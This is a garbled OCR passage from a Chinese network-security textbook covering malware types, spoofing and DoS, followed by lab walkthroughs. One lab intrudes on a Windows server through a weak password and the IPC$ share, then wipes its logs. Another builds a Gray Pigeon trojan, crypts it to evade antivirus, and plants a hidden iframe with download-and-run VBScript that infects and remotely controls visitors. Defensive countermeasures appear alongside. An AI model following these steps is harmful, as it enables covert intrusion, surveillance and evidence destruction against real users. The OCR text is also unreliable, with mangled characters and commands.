存在 。 当 蠕虫 通过 系统 漏洞 入 侵 计算 机 后 ,首先 扫描 网 络 中 含有 相同 漏洞 的 其 他 计算 机 ,再 
将 自身 副本 发 送 给 这 些 计 算 机 ,不 断 扩 大 感染 规模 。 局 域 网 中 的 共享 文件 夹 . 电 子 邮件 、 恶 
意 网 页 等 都 是 蠕虫 传播 的 良好 途径 。 当 蠕虫 形成 一 定 规模 后 ,其 传播 速度 会 极 大 消耗 网 络 
带宽 ,从 而 导致 网 络 拥塞 甚至 瘫痪 。 

3. 特洛伊 木马 

特洛伊 木马 的 名 字 起 源 于 希腊 神话 "木马 屠城 记 ”。 古 希腊 用 大 军 围攻 特洛伊 城 , 久 攻 
不 下 ,于 是 有 人 献计 制造 一 只 高 二 丈 大 木马 ,让 士兵 藏匿 于 木马 之 中 ,大 部 队 伴 装 撤退 并 将 
木马 按 弃 于 特洛伊 城下 。 城 中 以 为 敌 军 退 军 , 遂 将 “木马 "作为 战利品 拖 入 城内 ,全 城 饮酒 狂 
欢 。 到 午夜 时 分 , 匿 于 木马 中 的 将 士 开启 城 门 ,四 处 纵火 , 城 外 伏兵 涌 入 ,部 队 里 应 外 合 焚 层 
特洛伊 城 , 以 此 成 名 为 “特洛伊 木马 *。 黑 客 程序 借用 其 名 ,有 "一 经 潜入 ,后 患 无 穷 ” 之 意 。 

“木马 "与 病毒 不 同 , 它 不 会 自我 复制 ,也 不 需要 寄生 宿主 。 木 马 程序 由 两 部 分 组 成 : 一 
是 服务 端 ; 二 是 客户 端 ,也 称 为 控制 端 。 控 制 端 由 服务 端 生成 ,通过 木马 绑 定 ,更 改 图 标 等 
方法 吸引 用 户 下 载 执 行 ,服务 端 便 可 远程 控制 客户 端 系统 、 窃 取 用 户 资料 ,操控 被 控 主 机 等 。 

4. 恶作剧 

恶作剧 程序 既 不 存在 感染 性 ,也 不 存在 依附 性 ,属于 不 可 感染 独立 性 恶意 代码 。 恶 作 剧 
设计 之 初 并 没有 破坏 之 意 , 仅 是 捉弄 人 的 一 种 程序 ,例如 ,让 用 户 不 断 单 击 鼠标 几 十 次 才能 
关闭 浏览 器 等 。 但 是 , 随 着 计算 机 网 络 的 发 展 , 也 出 现 了 很 多 带 有 破坏 性 的 恶作剧 程序 , 轻 
者 导致 系统 反复 重启 ,严重 的 会 格式 化 硬盘 甚至 改写 硬盘 磁道 ,损毁 数据 。 

针对 以 上 4 种 恶意 代码 最 好 方法 是 防范 而 不 是 查 杀 : 一 是 恶意 代码 经 免 杀 变异 后 能 轻 
易 躲 过 杀毒 软件 查 杀 ; 二 是 恶意 代码 需要 在 计算 机 执行 后 才 会 生效 ,只 要 防范 到 位 ,不 给 恶 
意 代码 植 人 机 会 就 能 防 患 于 未 然 。 针 对 恶意 代码 要 注意 以 下 几 点 。 

(1) 提高 防范 意识 ,不 要 执行 来 历 不 明 的 程序 。 恶 意 代码 一 般 通 过 电子 邮件 或 网 页 浏 
览 .下 载 执行 方 式 传播 ,因此 不 要 下 载 含有 附件 的 陌生 邮件 ,不 要 执行 来 历 不 明 的 程序 ,不 要 
单 击 任何 可 执行 文件 (* . exe), 另外 在 浏览 器 要 启用 弹出 窗口 阻止 程序 。 
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(2) 自动 更 新 病毒 库 或 利用 专 杀 工 具 。 目 前 ,国内 外 防 病毒 软件 大 都 可 以 免费 升级 ,并 
且 会 推出 针对 流行 恶意 代码 的 专 杀 工具 ,效果 显著 。 但 是 , 防 病 毒 软件 不 是 万 能 的 ,不 能 查 
杀 未 知 或 变异 恶意 代码 ,也 不 能 替代 防火 墙 , 文 件 经 查 杀 后 可 能 无 法 执行 ,因此 最 好 还 是 做 
好 防范 工作 。 

(3) 观察 系统 异常 ,及 时 断 开 网 络 。 一 旦 感觉 系统 有 被 攻击 迹象 ,在 没有 清除 恶意 代 
码 前 建议 先 断 开 网 络 避 免 信息 泄露 。 如 果 发 现 有 软件 正 使 用 大 于 1024 端口 发 送 数据 , 则 这 
个 端口 很 可 能 是 木马 或 蠕虫 对 外 通信 的 端口 ,此 时 应 对 系统 启动 文件 和 执行 进程 仔细 排查 ， 
并 确认 是 否 含有 病毒 木马 等 恶意 代码 。 

(4) 及 时 弥补 系统 漏洞 ,运行 更 新 防 病毒 软件 等 监控 程序 。 


8.3.4 欺骗 攻 击 


欺骗 攻击 是 通过 冒充 对 目标 主机 发 动 攻击 。 欺 骗 攻 击 种 类 很 多 ,下 面 介 绍 以 下 几 种 。 

(1) IP 欺骗 攻击 。IP 欺骗 攻击 并 不 是 通过 更 改 自身 IP 地 址 进行 攻击 ,而 是 利用 TCP/ 
IP 协议 缺陷 (不 属于 漏洞 ) 进 行 攻击 。IP 欺骗 融合 多 种 攻击 技术 ,涉及 IP 地 址 伪造 .TCP 
与 SYN 洪流 .TCP 序列 号 猜测 。 

(2) ARP 攻击 。ARP 攻击 在 前 面 章节 已 经 讲 到 ,局 域 网 主机 之 间 在 通信 前 必须 通过 
ARP 协议 将 目标 IP 地 址 解析 为 Mac 地 址 。 当 初 设 计 ARP 协议 时 没有 过 多 考虑 安全 问 
题 ,攻击 者 可 以 通过 伪造 IP-Mac 地 址 映射 关系 进行 ARP 欺骗 ,以 达到 网 络 监听 、 网 络 瘫 
痪 、 上 网 掉 线 等 攻击 效果 。 

(3) Cookie 欺骗 。Cookie 是 服务 器 保存 在 客户 端 浏览 器 的 身份 识别 ,用 户 只 需 登 录 一 
次 ,以 后 再 进入 该 站 点 即 可 自动 登录 ,避免 多 次 输入 密码 。Cookie 欺骗 就 是 修改 客户 端 
Cookie 达到 欺骗 服务 器 目的 。 虽 然 Cookie 信息 经 MD5 加 密 , 但 攻击 者 截获 Cookie 后 不 需 
破解 密 文 , 只 需 向 服务 器 提交 验证 后 即 可 冒充 他 人 身份 ,严重 危及 用 户 隐私 和 安全 。 

(4) DNS 欺骗 。DNS 欺骗 是 攻击 者 冒充 DNS 服务 器 响应 客户 请 求 进行 域名 解析 。 如 
果 攻 击 者 把 域名 解析 为 本 机 IP 地 址 返回 客户 端 ,那么 用 户 无 论 访问 哪个 站 点 都 会 跳 至 攻击 
者 指定 页 面 。 若 攻击 者 事先 在 页 面 挂 马 , 则 用 户 访问 后 就 会 被 控制 。 

(5) 源 路 由 欺骗 。 通 常情 况 下 数据 包 从 源 点 到 终点 所 经 路 径 是 由 两 节点 间 路 由 器 决定 
的 ,数据 包 本 身 只 知道 去 往 何 处 ,但 不 知道 该 如 何 去 。 源 路 由 欺骗 是 指 攻击 者 将 数据 包 所 经 
路 径 写 在 其 首部 ,使 数据 包 沿 指定 路 径 抵达 目的 节点 ,造成 信息 泄密 。 


8.3.5 拒绝 服务 攻击 


DoS(Denial of Service) 拒绝 服务 攻击 是 攻击 者 发 送 大量 泛 洪 请 求 至 目的 服务 器 ,使 其 
资源 耗 尽 或 连接 过 载 , 无 法 响应 合法 客户 请 求 。 拒 绝 服务 攻击 分 为 网 络 带宽 和 连通 性 攻击 。 
其 中 ,带宽 攻击 以 极 大 通信 量 冲击 目标 网 络 ,使 网 络 资源 消耗 列 尽 以 致 用 户 无 法 提交 连接 请 
求 ; 连通 性 攻击 是 攻击 者 发 送 大 量 虚假 连接 请 求 至 目标 服务 器 ,消耗 服务 器 系统 资源 或 抢 


@ ”如 在 对 计算 机 不 执行 任何 操作 时 ,硬盘 不 断 读 写 数据 .CPU 使 用 率 居 高 不 下 ,程序 停止 响应 、 系 统 运行 越 来 越 慢 
等 现象 。 
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占 连接 数量 ,使 其 无 法 响应 合法 用 户 请 求 ?。 典 型 拒绝 服务 攻击 有 以 下 3 种 形式 。 

(1) UDP 泛 洪 。UDP 洪水 基于 ECHO/CHARGEN 服务 。ECHO/CHARGEN 服务 
为 管理 员 提 供 路 由 可 达 性 测试 ,也 成 为 拒绝 服务 攻击 一 种 手段 。 攻 击 者 向 服务 器 发 送 UDP 
洪水 @, 目 标 服务 器 对 此 做 出 ECHO 或 CHARGEN 响应 ,由 此 产生 大 量 回 送 数据 包 堵 塞 带 

(2) SYN 泛 洪 。SYN 泛 洪 是 基于 TCP 三 次 担 协议 进行 的 拒绝 服务 攻击 。TCP 第 二 
次 握手 是 服务 器 接收 到 客户 机 SYN 请 求 后 回应 ACK 表示 同意 建立 连接 。 假 如 攻击 者 伪 
造 一 个 虚假 IP 假意 请 求 服务 器 连接 ,服务 器 做 出 响应 后 会 因为 IP 不 可 达 导致 超时 重 发 ,这 
种 状态 被 称 为 半 连 接 状 态 , 服 务 器 三 次 重 发 仍 未 收 到 响应 后 才能 拆除 半 连 接 。 若 攻击 者 发 
送 大 量 虚假 请 求 把 所 有 连接 占 满 ,那么 服务 器 就 会 拒绝 新 的 连接 请 求 ,即使 合法 用 户 也 无 法 
访问 服务 器 ,从 而 达到 拒绝 服务 攻击 目的 。 

(3) 死亡 之 Ping。 死 亡 之 Ping 是 对 目标 服务 器 发 送 大 量 Ping 探测 致使 其 系统 或 网 络 
瘫痪 。 由 于 早期 操作 系统 限制 ICMP@ 包 最 大 为 64KB, 当 通 过 指定 Ping 报 文大 小 8 超过 
64KB 上 限时 ,目标 服务 器 就 会 出 现 内 存 分 配 错误 导致 死机 。 

拒绝 服务 攻击 是 一 种 最 悠久 、 最 常用 的 攻击 形式 ,攻击 者 在 无 法 入 侵 服务 器 时 只 能 通过 
这 种 手段 将 目标 系统 或 网 络 瘫痪 。 拒 绝 服 务 攻击 很 难 防范 ,因为 服务 器 不 能 判断 一 个 连接 
请 求 是 正常 访问 还 是 一 种 攻击 ,目前 也 没有 根本 解决 方案 。 业 界 的 一 种 做 法 是 通过 减少 超 
时 重 发 的 等 待 延迟 以 缩短 服务 器 维持 半 连 接 时 间 ,在 一 定 程度 上 可 以 减轻 遭受 拒绝 服务 攻 
击 带 来 的 伤害 ,但 攻击 始终 无 法 避免 ,而 且 当 网 络 不 稳定 时 会 影响 正常 客户 访问 ; 另 一 种 方 
法 是 限制 来 自 同 一 IP 半 连 接 数 量 , 当 某 个 IP 尝试 与 服务 器 做 多 个 连接 时 即 判 为 攻击 ,直接 
将 半 连 接 拆 除 ,但 无 法 抵御 采用 大 量 虚假 IP 发 动 的 拒绝 服务 攻击 。 


8.4 黑客 入 侵 流 


工作 任务 十 六 入 侵 网 络 服 务 回 


工作 目的 

通过 文件 共享 漏洞 入 侵 服务 器 。 

工作 任务 

小 张 是 公安 机 关 网 络 监察 处 工作 人 员 , 发现 网 络 中 某 Web 服务 器 发 布 违法 信息 ,并 组 
织 人 员 参 与 扰乱 社会 秩序 活动 。 上 级 要 求 小 张 通过 入 侵 服 务 器 渗透 组 织 内 部 成 员 ,获得 他 
们 信息 和 联系 方式 进行 取证 。 


例如 一 个 站 点 页 面 无 法 浏览 或 访问 速率 很 慢 , 最 大 可 能 就 是 遭 到 拒绝 服务 攻击 。 

所 谓 UDP 洪水 ,就 是 发 送 大 量 UDP 请 求 。 

Ping 属于 ICMP 包 之 一 。 

例如 ping 192. 168.1.10 -T - 65550。 其 中 -T 参数 表示 不 断 发 送 Ping 报 文 ( 不 加 工人 参数 默认 发 送 4 
次 ); -L 指定 数据 包 大 小 ,64KB 即 65535b, 当 大 于 65535 数值 时 ,这 个 ping 命令 就 属于 死亡 之 Ping。 现 在 操作 系统 已 经 
弥补 这 个 漏洞 ,无 法 以 此 进行 攻击 。 


Se@ee 
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任务 分 析 

小 张 通过 扫描 软件 发 现 目 标 服务 器 安装 的 是 Windows 2003 第 二 版 本 操作 系统 。 经 查 
阅 Windows 2003 系统 存在 文件 共享 漏洞 ,只 要 获得 操作 系统 管理 员 账 号 和 密码 即 可 入 侵 
服务 器 ,查看 磁盘 所 有 文件 。 

工作 环境 和 工具 

(1) X-Scan 是 一 款 优秀 综合 扫描 器 , 它 采 用 多 线程 方式 对 目标 IP 地 址 段 进 行 安 全 漏洞 
检测 。X-Scan 扫描 内 容 包 括 远程 服务 类 型 .操作 系统 类 型 及 版 本 、 各 种 弱 口令 漏洞 后门、 
应 用 服务 漏洞 .网 络 设备 漏 洞 .拒绝 服务 漏洞 等 。 对 于 已 知 漏洞 ,X-Scan 给 出 相应 漏洞 描述 
和 解决 方案 。 

(2) IPC $ (Internet Process Connection) 是 共享 管道 资源 ,其 中 $ 表示 隐藏 共享 ,用 于 
管理 员 远 程 管理 计算 机 共享 资源 。 当 验证 合法 用 户 名 和 密码 时 ,可 以 获得 相应 资源 共享 访 
问 限 权 。IPC $ 漏洞 在 于 : 在 获得 合法 管理 员 账 号 和 密码 时 ,系统 默认 隐藏 共享 磁盘 所 有 文 
件 , 并 通过 字符 “$ ”进行 访问 ,例如 C 盘 为 C$ 。 

(3) 工作 环境 。 在 网 络 中 ,通过 主机 1 入 侵 主 机 2, 具体 工作 环境 拓扑 图 如 图 8-8 所 示 ， 
工具 和 录像 可 在 http://www. gdcp. cn/jpkc/lf 中 下 载 。 


A A 


T 


交换 机 


主机 1 小 张 主机 2 服务 器 
IP: 192.168.1.10 IP: 192.168.1.20 
Mask : 255.255.255.0 Mask : 255.255.255.0 
主机 名 称 | 担任 角色 | ”IP 地 址 | 操作 系统 | ”账号 密码 软件 
主机 1 小 张 192168.110 |Windows XP | X-scan、 Clearlog 
主机 2 | 服务 器 192.168.1.20 | Windows 2003| Administrator 123456 


图 8-8 工作 任务 十 六 的 工作 环境 拓扑 图 


工作 过 程 

(1) 启动 主机 2, 选择 “管理 工具 ”一 “计算 机 管理 "命令 ,在 打开 的 窗口 中 选择 “本 地 用 户 
和 组 ”选项 ,然后 右 击 Administrator 并 选择 “设置 密码 ”命令 对 账号 设置 密码 ,如 “123456”， 
如 图 8-9 所 示 。 

(2) 主机 1 打开 X-Scan 扫描 工具 ,选择 “设置 ”一 “扫描 参 数 ” 命 令 , 然 后 在 “指定 IP 范 
围 ” 文 本 框 中 输入 目标 主机 2 的 IP“192. 168. 1. 20”; 并 选择 “全 局 设置 "选项 中 的 “扫描 模 
抉 ”选项 ,然后 选中 “NT-Server 弱 口 令 ? 选 项 ,扫描 完成 后 在 “漏洞 信息 ” 框 中 可 以 看 到 本 例 
操作 系统 账号 为 “administrator”, 密 码 是 “123456”, 如 图 8-10 所 示 。 

(3) 当 获 得 账号 和 密码 后 ,主机 1 在 运行 窗口 通过 cmd 命令 进入 DOS; 输入 “net 品 use 
\\192. 168. 1. 20\ipc$ 口 123456 口 /user:Administrator”( 注 : 口 表示 空格 ), 若 看 到 提示 
“命令 成 功 完成 。" 则 表示 入 侵 成 功 , 和 否则 重新 输入 ,注意 命令 格式 ,如 图 8-11 所 示 。 
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算 机 管理 =I9lx| 
局 文件 外” 哲 作 届 ”查看 WD 窗口 外 ”帮助 0 JlEs| 
卸 少 | 个 | 国 |X 办 切 | 名 四 


了 股 定 用 户 密码 。 I [ 


图 8-9 设置 密码 


-Scan v3.3 GUI 
文件 WW) 设置 @) 查看 G) 工具 QD Language 帮助 必 ) 
|@|m| 因 | 国 雪 | 加 


下 请 !9z.168.120 [主机 黑 计时 间 | 插件 时 间 | 活动 线程 | 当前 进度 
192.168.1.20 151 151 1 正在 检测 “NT-Serv| 


® 
和 信息 [所 油 信息 | 增设 信息 | 


[ [192 168.1. 20]: 发现 厅 -Server 弱 口令 iminis trator /123458" | 


| Active/Waximun host thread: 1/10, Corrent/Maxim 


图 8-10 扫描 账号 名 和 密码 


icrosoft Windows XP [版 本 5-1.2699] 
kc> 版 权 所 有 1985-2881 Microsoft Corp. 


:\Docunents and Settingshdninistratorycd 、\ 
:net use \\192.168.1.280\ipc$ 123456 /user:Adninistrator 


图 8-11 通过 共享 漏洞 入侵 


(4) 映射 目标 盘 符 ,输入 “net 口 use 口 Y: 口 \\192. 168. 1.20\c$”, 表 示 把 目标 主机 2 的 
C 盘 映 射 到 本 地 Y 盘 。 此 时 ,打开 主机 1 的 “我 的 电脑 ”发 现 系统 增加 了 一 个 共享 Y 盘 , 如 
图 8-12 所 示 。 双 击 Y 盘 可 以 访问 目标 主机 C 盘 所 有 文件 ,并 可 以 通过 鼠标 拖 搜 进行 复制 、 


粘贴 .删除 等 操作 。 


(5) 涂抹 痕迹 。 主 机 1 在 离开 时 需要 将 目标 主机 2 系统 日 志文 件 全 部 删除 ,因为 它 记 
录 了 来 自 每 次 远程 连接 的 了 P 地址 、 时 间 和 操作 记录 ; 将 “clearlog. exe "工具 复制 到 主机 ]1 的 
C 盘 根 目录 ,输入 以 下 内 容 。 


clearlog 


clearlog 


clearlog 


\\192. 168. 1.200D-app // 清 除 远 程 计算 机 应 用 程序 日 志 
\\192.168. 1.200-sec // 清 除 远程 计算 机 安全 日 志 
\\192.168.1.20D-sys // 清 除 远 程 计算 机 系统 日 志 
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时 我 的 电脑 
文件 人 ”编辑 于) 查看 WD 收藏 和 工具 中 家 助 0 


OE - © |Par Bxtx | 回 : 


是 我 的 电脑 _ | 
局 “在 这 各 计算 机 上 存储 的 文件 


系统 任务 


查看 系统 信息 一 ] # 享 一 Aainistrater 的 广 
时 | jia i ] 


Sp sl 


图 8-12 ”映射 对 方 盘 符 


(6) 删除 本 次 连接 ,输入 “net 口 use 口 \\192. 168. 1. 20Nipc$ 


/del”; 删除 本 地 映射 


盘 , 输 入 “net 口 use 口 y: 口 /del”, 此 时 打开 “我 的 电脑 ”发现 盘 符 Y 已 经 删除 。 


任务 总 结 着 


IPC$ 文 共享 共 漏 洞 是 典型 服务 器 入 侵 手 段 , Windows 2000、Windows 2003 等 服务 器 
版 本 操作 系统 默认 隐藏 共享 磁盘 所 有 文件 ,由 此 产生 安全 漏洞 。 若 不 需要 开启 此 服务 , 服 


务 器 要 注意 关闭 隐藏 共享 以 减少 入侵 风险 ,防范 措施 如 下 。 


(1) 禁止 匿名 连接 。 运 行 “regedit” 进 入 注册 表 , 在 选择 “HKEY_LOCAL_MacHINE\ 
SYSTEM\CurrentControlSet\Control\Lsa” 选 项 ,再 右 击 restrictanonymous 选项 ,选择 “ 修 
改 ” 命 令 将 “restrictanonymous” 项 设置 为 1” 开启 禁止 匿名 IPC$ 连接 ,如 图 8-13 所 示 。 


代 " 注册 表 篇 辑 器 
注册 表 (R) 编辑 (E) 查看 (Vy) 收藏 (ED 帮助 (d) 


mA Kerberos 


图 8-13 修改 restrictanonymous 值 


@ Windows XP、Windows Vista 和 Windows 7 系统 都 不 存在 该 漏洞 ,因为 这 些 操作 系统 都 是 面向 用 户 , 非 服务 器 


版 本 ,不 需 对 外 提供 服务 。 
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(2) 永久 关闭 IPC$ 文件 共享 服务 。 选 择 “ 管 理工 具 ”>“ 服 务 ” 命 令 , 右 击 Server 选项 ， 
在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,在 弹出 的 对 话 框 中 的 “启动 类 型 "下 拉 列 表 中 选择 “ 禁 
用 ”选项 ,再 停止 该 服务 ,如 图 8-14 所 示 。 


Server 的 必 性 (本 地 计算 机 ) ZIx| 
常规 | 星 录 | 饶 复 | 依存 关系 | 


可 执行 文件 的 路 径 0 - 
EVIDONS\systen32\svehost. exe -k netsves 


启动 类 型 E): | 某 用 = 


服务 状态 : 已 停止 


启动 | 人 IEOD ] 看 依 呵 | Led 


当 从 此 处 司 动 服务 时 ， 您 可 指定 所 适用 的 启动 参数 
司 动 参政 0 [ 


确定 取消 | 
图 8-14 关闭 ipe$ 文件 共享 服务 


工作 任务 十 七 ”控制 远程 计算 机 


工作 目的 

利用 灰 铅 子 木马 监控 远程 计算 机 。 

工作 任务 

在 工作 任务 十 六 中 已 成 功 入 侵 发 布 违法 信息 的 服务 器 。 为 进一步 取证 ,上 级 要 求 小 张 
对 访问 过 该 服务 器 站 点 的 计算 机 实施 全 天 实时 远程 监控 。 

任务 分 析 

灰 蚀 子 2011 是 一 款 著名 的 远程 监控 木马 软件 ,只 要 加 密 加 壳 变 种 后 就 能 避免 大 部 分 杀 
毒 软 件 查 杀 。 灰 鸽子 木马 有 两 部 分 组 成 ,一 是 控制 端 ,一 是 由 其 生成 的 服务 端 。 只 要 在 人 侵 
的 Web 服务 器 上 挂 灰 锐 子 木马 ,那么 访问 过 该 站 点 客户 端 后 台 就 会 自动 执行 木马 服务 端 ， 
从 而 受 控制 端 监控 。 

工作 环境 和 工具 

具体 工作 环境 拓扑 图 如 图 8-15 所 示 , 工 具 可 在 http://www. gdcp. cn/jpkc/lf 中 下 载 。 

(1) 灰 鲁 子 简介 。 灰 鲍 子 是 国内 一 款 极 具 破 坏 性 的 木马 , 它 功 能 强大 ,操作 灵活 ,支持 
自动 上 线 功 能 。 灰 钢 子 工作 室 成 立 于 2003 年 年 初 ,原本 定位 于 远程 控制 .远程 管理 .远程 监 
控 软 件 开 发 ,主要 提供 给 网 吧 ,企业 及 个 人 用 户 远程 管理 计算 机 。 然 而 ,目前 互联 网 上 出 现 
利用 灰 铝 子 实现 远程 控制 的 木马 程序 ,中 了 灰 铝 子 木马 的 计算 机 每 次 启动 都 会 主动 连接 控 
制 端 ,提供 文件 访问 .屏幕 控制 .远程 命令 和 进程 管理 等 操作 ,具有 和 良好 隐蔽 性 ,不 受 防火 墙 
及 网 络 结构 影响 。 

(2) 特征 码 简介 。 特 征 码 是 针对 病毒 木马 做 出 的 特征 描述 , 它 可 以 是 一 段 字 符 或 是 特 
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机 1: 小 张 


ip: 192.168.1.10 3 志 机 35， 中 区 
Wp: 192168110. 0 Tp: 192.168.1.30 
ask: 355.255.255. 加 Mask: 255.255.255.0 


主机 2: 服务 
IP: 192.168.1.20 
Mask: 255.255.255.0 


[主机 名 称 | 角色 ”| IP 地 址 操作 系统 工具 
主机 1 | 小 张 192.168.1.10 | Windows 2003 | 区 的 了 tt 
主机 2 | 服务 器 | 192.168.1.20 | Windows 2003 |Baidu 网 站 

| 主机 3 | 肉鸡 | 192.168.1.30 | Windows XP sp2 | 360 安 全 卫士 


图 8-15 工作 任务 十 七 的 工作 环境 拓扑 图 


定位 置 调用 的 一 个 函数 。 病 毒 防御 工作 者 在 截获 到 新 病毒 时 ,首先 分 析 其 执行 后 动作 , 例 
如 ,会 生成 什么 新 文件 ,怎样 更 改 注册 表 ,怎样 注册 服务 .打开 哪个 端口 等 ,再 研究 病毒 文件 
结构 , 找 出 其 与 众 不 同 之 处 定义 为 特征 码 ,病毒 库 就 是 特征 码 的 集合 。 

(3) 免 杀 简介 。 杀 毒 软件 基于 特征 码 查 杀 ,将 文件 与 病毒 库 特 征 码 进行 匹配 , 若 两 者 吻 
合 即 判 为 病毒 。 免 杀 原 理 是 通过 修改 病毒 文件 特征 码 ,从 而 避免 杀毒 软件 查 杀 。 从 某 种 程 
度 上 说 , 免 杀 是 杀毒 软件 对 立 面 , 随 着 杀毒 软件 病毒 库 升 级 而 升级 。 

(4) Schattenreich Crypter 文件 加 密 工 具 。Schattenreich Crypter 是 一 款 文件 加 密 工 
有 具 。 文 件 经 加 密 后 会 改变 内 部 结构 ,将 二 进 制 值 移 位 、 乱 序 ,或 通过 其 他 方式 表达 ,从 而 更 改 
病毒 特征 值 达 到 免 杀 效果 。 

工作 过 程 

(1) 在 主机 2 发 布 站 点 ,可 自 编 站 点 。 本 例 采 用 Baidu 站 点 , 根 目录 为 "C:\baidu”, 主 
页 文档 是 “index. htm”。 

(2) 主机 1 通过 文件 共享 漏洞 入 侵 主 机 2 服务 器 ,详细 参阅 工作 任务 十 六 。 

(3) 主机 1 打开 灰 铝 子 2011 木马 程序 ,打开 ”配置 服务 端 ? 对 话 框 , 然 后 选择 “自动 上 
线 ? 选 项 卡 ,再 输入 IP 通知 地 址 ( 即 本 机 IP) “192. 168. 1. 10”, 上 线 端口 默认 为 “8000”, 在 桌 
面 上 生成 “1. exe” 服 务 端 , 如 图 8-16 所 示 。 

(4) 打开 Schattenreich Crypter 文件 加 密 工 具 , 选 中 木马 服务 端 程序 “1. exe” 进 行 加 密 ， 
如 图 8-17 所 示 。 

(5) 用 记事 本 打开 “Trojan. htm” 静 态 页 面 , 在 跳 转 url 处 填写 主机 1 的 IP*192. 168. 1. 10”， 
木马 文件 名 是 “1. exe”, 即 客户 机 访问 “Trojan. htm” 页 面 时 将 自动 下 载 和 执行 “1. exe” 灰 铅 
子 控制 端 , 如 图 8-18 所 示 。 

(6) 将 “Trojan. htm” 和 “1. exe” 共 同 放 在 新 建 的 Web 文件 夹 内 。 若 磁盘 是 NTFS 格式 
分 区 还 需 添 加 文件 访问 权限 . 右 击 Web 文件 夹 , 在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,在 弹 
出 的 对 话 框 中 选择 “安全 ”选项 卡 , 然 后 添加 “Everyone” 访 问 权 限 , 如 图 8-19 所 示 。 
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卜 各 苇 配 于 罗 J 攻 x 硬 | 

自动 上 贱 | 安装 选项 | 局 动 项 | 代理 服务 | 高 纪 渤 项 | 国标 插件 功能 | 
《得 用 IT? 通知 ) Th 解析 域名 、 轿 定 IT 或 网 页 文件 

192.168.1.10 | 说明 

上 吉田 舟 : 国 ， 上 嫩 计 口 :[5000 

上 上 贱 分 姐 : |[ 目 动 上 经 个 鸡 

上 贱 备 注 : 

连接 密码 : 

配置 记录 : 


2011-08-03_123628 


小 飞 询 子 远程 控制 YIP 专 版 
回电 信服 务 器 下 载 口 网 而 服务 器 下 载 


:mesWdninistrator\ 硕 面 \L_ exe 辐 | 


图 8-16 生成 服务 端木 马 


A Schattenreich Crypter v0.2 


| Cr VDocments und Settines\Lee\ AM exe | EGR 
口 Ieen idern 


5 


图 8-17 对 木马 服务 端 加 密 


本 
文件 全 ) 编 回 是 ) 格式 介 ) 查看 帮助 0 


《4-- 创建 hdodb .Stream 对 象 ， 提供 码 取 二 进 制 数 据 式 文 本 流 
Set ados = Sh createObject("Adodb.Stream" 
ados.type = 


[4 借 电 ni GET 初 始 化 HTTP 请 求 --> 


url = "http://192.168.1.19:80/1.exe"™ 
xh -0pen "GET™, url, False 
《+-- 发 送 HTTP 靖 求 ， 并 获取 HTTP 响 应 - 


xh-Send 


a BA 


图 8-18 配置 灰 饮 子 木 马 地 址 


(7) 在 主机 1 的 IIS 中 发 布 该 站 点 , 根 目 录 是 "<C:\Web”, 主 页 文档 是 "Trojan. htm”。 

(8) 打开 主机 1 映射 的 Y 盘 , 用 记事 本 打开 主机 2 服务 器 中 “Baidu\index. htm” 文 件 ， 
并 随意 插入 跳 转 代码 “二 iframe src 王 http://192. 168. 1. 10/ width==0 height = 二 0> 
二/iframe 宇 ”, 即 在 访问 该 页 面 的 同时 ,打开 一 个 长 和 宽 都 是 0 像素 的 隐藏 子 窗口 , 子 窗口 
指定 访问 192. 168. 1. 10 站 点 ,如 图 8-20 所 示 。 

(9) 在 主机 3 的 肉鸡 上 安装 360 安全 卫士 后 ,访问 主机 2 站 点 “http://192. 168. 1. 20”， 
在 浏览 页 面 的 同时 打开 一 个 大 小 为 0X0 的 隐藏 子 窗口 ,指向 “http://192. 168. 1.10” 并 自 
动 下 载 执行 “1. exe" 灰 角子 木马 ,然后 在 主机 1 静 待 上 线 小 鸡 。 
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tt x 


常规 | 共享 ”安全 |web 共享 | 自 定义 | 


姐 或 用 户 名 称 @): 
hministrators (EE 机 3\Adninistrators) 


Users GM3Wsers) 


ETT Wh | 


Everyone 的 权限 下 ) 区 许 


区 


口 
口 


区 


1DOODOOOD 悦 


回 
J 


特别 权限 或 高 级 设置 ,请 单 击 “ 高 级 ”。 高 级 中) | 


图 8-19 添加 文件 访问 权限 


E hte - 记事 本 咱 = 上 xl 
文件 到 ) 编辑 证 )】 格式 中 ) 查看 帮助 0 

《+D0CTYPE HTML PUBLIC “~-//W3C//DTD HTML 4.8 Transitional//EN"> 
《<?-- saued From url=(8821)http://www.baidu.com/ —> 


KHTML><HEAD><TITLE> 百 度 一 下 ， 你 就 知道 </TITLE> 
Kiframe src=http://192.168.1.198 width=B height=8></iframe> 
ttp-equiv=Content-Type content=text7/htni;charset=gb: 


图 8-20 配置 跳 转 地 址 


(10) 观察 主机 1 灰 铝 子 控制 端 ,发 现 IP 为 “192.168.1.30” 的 主机 上 线 提示 ,此 时 可 以 
访问 主机 3 的 磁盘 文件 资源 ,还 可 以 对 其 屏幕 进行 监控 和 控制 ,如 图 8-21 所 示 。 


;文件 时 设置 @) 工具 G) 帮助 o 


:当前 连接 :| 主机 3-192. 163.1.30 ] 电脑 名 称 : [主机 3 连接 密码 : 


Dp BDocwments snd Settings 


计 - 缚 目 动 上 战 小 玖 (0) [TS 
BE a sense 
上 Brnmors 


名 mw 
1 


命令 发 送 完毕 ! 请 等 待 主机 回 应 . 15:13:27 
15 个 对 象 ”当前 路 径 : C:\ 自动 上 线 : 1 台 


图 8-21 查看 上 线 主机 
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任务 总 结 着 


灰 铝 子 木 马 具 有 很 强 的 隐蔽 性 ,制作 者 在 如 何 逃 过 杀毒 软件 查 杀 上 做 了 很 多 工作 。 灰 
铝 子 木马 在 做 免 杀 后 会 产生 新 变种 ,一 旦 运行 立刻 消失 。 基 于 病毒 库 查 杀 的 杀毒 软件 由 于 
无 法 识别 新 变种 ,扫描 不 到 灰 铝 子 木马 ,即使 采用 专 杀 工 具 强行 印 载 灰 铝 子 也 有 可 能 导致 系 
统 崩溃 ,这 些 都 进一步 推动 灰 镶 子 在 网 络 上 的 泛滥 。 在 中 了 灰 铝 子 后 ,最 好 手工 清除 ,除了 
停止 灰 铝 子 服 务 外 还 要 删除 服务 端 程序 ,步骤 如 下 。 

(1) 选择 “开始 ”一 “运行 ”命令 ,然后 输入 “Regedit. exe” 进 入 注册 表 编 辑 器 ,打开 
HKEY_LOCAL_MacHINE\SYSTEM\CurrentControlSet\Services 注册 表 项 。 

(2) 查找 灰 铝 子 服 务 ,在 “注册 表 编 辑 器 ”窗口 中 选择 “编辑 ”一 “查找 ”>“ 查 找 目 标 ” 命 
